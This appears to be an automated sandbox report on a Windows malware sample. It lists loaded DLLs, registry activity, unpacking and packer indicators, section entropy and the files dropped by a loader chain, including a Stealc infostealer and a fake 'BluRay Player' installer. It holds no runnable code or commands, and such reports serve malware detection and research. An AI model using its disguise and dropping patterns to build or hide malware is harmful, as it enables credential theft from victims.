Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BluRay Player_is1

Source: file.exe

Static file information: File size 1882624 > 1048576

Source: file.exe

Static PE information: Raw size of qmypprrr is bigger than: 0x100000 < 0x199e00

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000007.00000002.3149073539.000000006C2FF000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000002.3618334787.00000000002A2000.00000040.00000001.01000000.00000022.sdmp, YJJA1RDG0PY87AD1W2WB98M4U9.exe, 0000002F.00000003.3422047848.00000000048C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.740000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qmypprrr:EW;woialkny:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	Unpacked PE file: 39.2.blurayplayer32.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Unpacked PE file: 40.2.3288f0a855.exe.5e0000.0.unpack :EW;.rsrc :W;.idata :W;mnwtlczj:EW;cxnprjgo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;mnwtlczj:EW;cxnprjgo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Unpacked PE file: 47.2.YJJA1RDG0PY87AD1W2WB98M4U9.exe.2a0000.0.unpack :EW;.rsrc:W;.idata :W;skavtqir:EW;kblajhtw:EW;.taggant:EW; vs :ER;.rsrc:W;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe

Unpacked PE file: 39.2.blurayplayer32.exe.400000.0.unpack

.NET source code contains potential unpacker

Source: 32.2.dc753b12e1.exe.1c1b0000.2.raw.unpack, searchX64LPVOIDhierarchy.cs

.Net Code: WaitDelegatesetLatencyMode

Source: hhnjqu9y[1].exe.6.dr

Static PE information: 0xF4D0C551 [Fri Feb 26 10:58:25 2100 UTC]

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 7_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_006A9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 3288f0a855.exe.6.dr	Static PE information: real checksum: 0x2e8eef should be: 0x2e066f
Source: stealc_default2[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: Application.exe.32.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: GOLD1234.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: 51a08c3032.exe.6.dr	Static PE information: real checksum: 0x216738 should be: 0x20d342
Source: stail.exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x5498fc
Source: stealc_default2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x516aa
Source: yxrd0ob7[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbecff
Source: file.exe	Static PE information: real checksum: 0x1d161f should be: 0x1cfe04
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: real checksum: 0x2a05fc should be: 0x2ad503
Source: yxrd0ob7.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbecff
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x2e8eef should be: 0x2e066f
Source: stail[1].exe.9.dr	Static PE information: real checksum: 0x0 should be: 0x5498fc
Source: 109418c5c3.exe.6.dr	Static PE information: real checksum: 0x2dae4e should be: 0x2dc939
Source: Gxtuum.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x6bdf3
Source: dc753b12e1.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x2dae4e should be: 0x2dc939
Source: 2bbdb01603.exe.6.dr	Static PE information: real checksum: 0x2dae4e should be: 0x2dc939
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x0 should be: 0x86b26
Source: Offnewhere.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6bdf3
Source: RDX123456[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d161f should be: 0x1cfe04
Source: GOLD1234[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xacdea
Source: Offnewhere[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6bdf3
Source: RDX123456.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x5876f
Source: efbc18aa93.exe.6.dr	Static PE information: real checksum: 0x216738 should be: 0x20d342
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x216738 should be: 0x20d342

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: qmypprrr
Source: file.exe	Static PE information: section name: woialkny
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: qmypprrr
Source: axplong.exe.0.dr	Static PE information: section name: woialkny
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name: mnwtlczj
Source: random[1].exe.6.dr	Static PE information: section name: cxnprjgo
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 3288f0a855.exe.6.dr	Static PE information: section name:
Source: 3288f0a855.exe.6.dr	Static PE information: section name: .rsrc
Source: 3288f0a855.exe.6.dr	Static PE information: section name: .idata
Source: 3288f0a855.exe.6.dr	Static PE information: section name: mnwtlczj
Source: 3288f0a855.exe.6.dr	Static PE information: section name: cxnprjgo
Source: 3288f0a855.exe.6.dr	Static PE information: section name: .taggant
Source: GOLD1234[1].exe.6.dr	Static PE information: section name: .00cfg
Source: GOLD1234[1].exe.6.dr	Static PE information: section name: .call
Source: GOLD1234.exe.6.dr	Static PE information: section name: .00cfg
Source: GOLD1234.exe.6.dr	Static PE information: section name: .call
Source: yxrd0ob7[1].exe.6.dr	Static PE information: section name: .back
Source: yxrd0ob7.exe.6.dr	Static PE information: section name: .back
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name:
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name: .themida
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name: .boot
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name:
Source: hhnjqu9y.exe.6.dr	Static PE information: section name: .themida
Source: hhnjqu9y.exe.6.dr	Static PE information: section name: .boot
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: .rsrc
Source: random[2].exe.6.dr	Static PE information: section name: .idata
Source: random[2].exe.6.dr	Static PE information: section name:
Source: random[2].exe.6.dr	Static PE information: section name: mmyokrrt
Source: random[2].exe.6.dr	Static PE information: section name: cvfsshmr
Source: random[2].exe.6.dr	Static PE information: section name: .taggant
Source: efbc18aa93.exe.6.dr	Static PE information: section name:
Source: efbc18aa93.exe.6.dr	Static PE information: section name: .rsrc
Source: efbc18aa93.exe.6.dr	Static PE information: section name: .idata
Source: efbc18aa93.exe.6.dr	Static PE information: section name:
Source: efbc18aa93.exe.6.dr	Static PE information: section name: mmyokrrt
Source: efbc18aa93.exe.6.dr	Static PE information: section name: cvfsshmr
Source: efbc18aa93.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name: bujgvxmj
Source: random[1].exe0.6.dr	Static PE information: section name: wxhexoyo
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 109418c5c3.exe.6.dr	Static PE information: section name:
Source: 109418c5c3.exe.6.dr	Static PE information: section name: .idata
Source: 109418c5c3.exe.6.dr	Static PE information: section name: bujgvxmj
Source: 109418c5c3.exe.6.dr	Static PE information: section name: wxhexoyo
Source: 109418c5c3.exe.6.dr	Static PE information: section name: .taggant
Source: 51a08c3032.exe.6.dr	Static PE information: section name:
Source: 51a08c3032.exe.6.dr	Static PE information: section name: .rsrc
Source: 51a08c3032.exe.6.dr	Static PE information: section name: .idata
Source: 51a08c3032.exe.6.dr	Static PE information: section name:
Source: 51a08c3032.exe.6.dr	Static PE information: section name: mmyokrrt
Source: 51a08c3032.exe.6.dr	Static PE information: section name: cvfsshmr
Source: 51a08c3032.exe.6.dr	Static PE information: section name: .taggant
Source: 2bbdb01603.exe.6.dr	Static PE information: section name:
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: .idata
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: bujgvxmj
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: wxhexoyo
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: .taggant
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.6.dr	Static PE information: section name: .vmp+
Source: freebl3.dll.7.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.7.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.7.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.7.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.7.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.7.dr	Static PE information: section name: .didat
Source: nss3.dll.7.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.7.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.7.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.7.dr	Static PE information: section name: .00cfg
Source: JavUmar[1].exe.9.dr	Static PE information: section name: .eh_fram
Source: JavUmar.exe.9.dr	Static PE information: section name: .eh_fram
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name:
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: .idata
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: skavtqir
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: kblajhtw
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: .taggant
Source: service123.exe.31.dr	Static PE information: section name: .eh_fram
Source: SfOAQrSBjSOejUhiNHNf.dll.31.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_009ED84C push ecx; ret	6_2_009ED85F
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_006AB035 push ecx; ret	7_2_006AB048
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 7_2_6C0FB536 push ecx; ret	7_2_6C0FB549

Source: file.exe	Static PE information: section name: entropy: 7.982036434291499
Source: file.exe	Static PE information: section name: qmypprrr entropy: 7.953569350952445
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.982036434291499
Source: axplong.exe.0.dr	Static PE information: section name: qmypprrr entropy: 7.953569350952445
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.979237157579985
Source: 3288f0a855.exe.6.dr	Static PE information: section name: entropy: 7.979237157579985
Source: GOLD1234[1].exe.6.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: GOLD1234.exe.6.dr	Static PE information: section name: .text entropy: 7.010787961155337
Source: yxrd0ob7[1].exe.6.dr	Static PE information: section name: .text entropy: 7.0802944473385505
Source: yxrd0ob7.exe.6.dr	Static PE information: section name: .text entropy: 7.0802944473385505
Source: hhnjqu9y[1].exe.6.dr	Static PE information: section name: entropy: 7.9998422661863415
Source: hhnjqu9y.exe.6.dr	Static PE information: section name: entropy: 7.9998422661863415
Source: random[2].exe.6.dr	Static PE information: section name: mmyokrrt entropy: 7.952987847188495
Source: efbc18aa93.exe.6.dr	Static PE information: section name: mmyokrrt entropy: 7.952987847188495
Source: random[1].exe0.6.dr	Static PE information: section name: entropy: 7.978887895475928
Source: 109418c5c3.exe.6.dr	Static PE information: section name: entropy: 7.978887895475928
Source: 51a08c3032.exe.6.dr	Static PE information: section name: mmyokrrt entropy: 7.952987847188495
Source: 2bbdb01603.exe.6.dr	Static PE information: section name: entropy: 7.978887895475928
Source: random[1].exe1.6.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: dc753b12e1.exe.6.dr	Static PE information: section name: .text entropy: 7.82060659626259
Source: univ[1].exe.9.dr	Static PE information: section name: .text entropy: 7.390972119322009
Source: YJJA1RDG0PY87AD1W2WB98M4U9.exe.30.dr	Static PE information: section name: entropy: 7.788948878023572
Source: Application.exe.32.dr	Static PE information: section name: .text entropy: 7.82060659626259

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpango-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdkmm-2.4-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001527001\yxrd0ob7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IRAOB.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-TQ33C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	File created: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD1234[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\stail[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-C986N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\splwow64[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpcre-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangowin32-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-T38SK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EV6NO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libglibmm-2.4-1.dll (copy)	Jump to dropped file
